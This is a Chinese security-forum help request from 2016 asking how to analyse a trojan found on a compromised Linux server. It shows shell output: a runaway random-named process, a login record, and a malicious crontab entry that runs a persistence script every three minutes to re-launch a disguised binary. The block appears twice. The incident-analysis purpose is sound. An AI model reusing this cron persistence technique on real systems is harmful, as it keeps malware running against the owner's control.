-
-
[旧帖] [求助]木马样本一枚,求破解思路 0.00雪花
-
发表于: 2016-6-12 11:32
-
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3494 root 19 0 378m 25m 212 R 1595.6 0.7 5798:34 eyshcjdmzg
-bash-4.3# last -10
user pts/3 11X.25.49.200 Mon Jun 6 23:46 - 01:47 (02:01)
入侵路径:某普通宽带用户
-bash-4.3# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
*/3 * * * * root /etc/cron.hourly/gcc.sh
-bash-4.3# vi /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done #主动打开网络
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
3494 root 19 0 378m 25m 212 R 1595.6 0.7 5798:34 eyshcjdmzg
-bash-4.3# last -10
user pts/3 11X.25.49.200 Mon Jun 6 23:46 - 01:47 (02:01)
入侵路径:某普通宽带用户
-bash-4.3# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
*/3 * * * * root /etc/cron.hourly/gcc.sh
-bash-4.3# vi /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done #主动打开网络
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
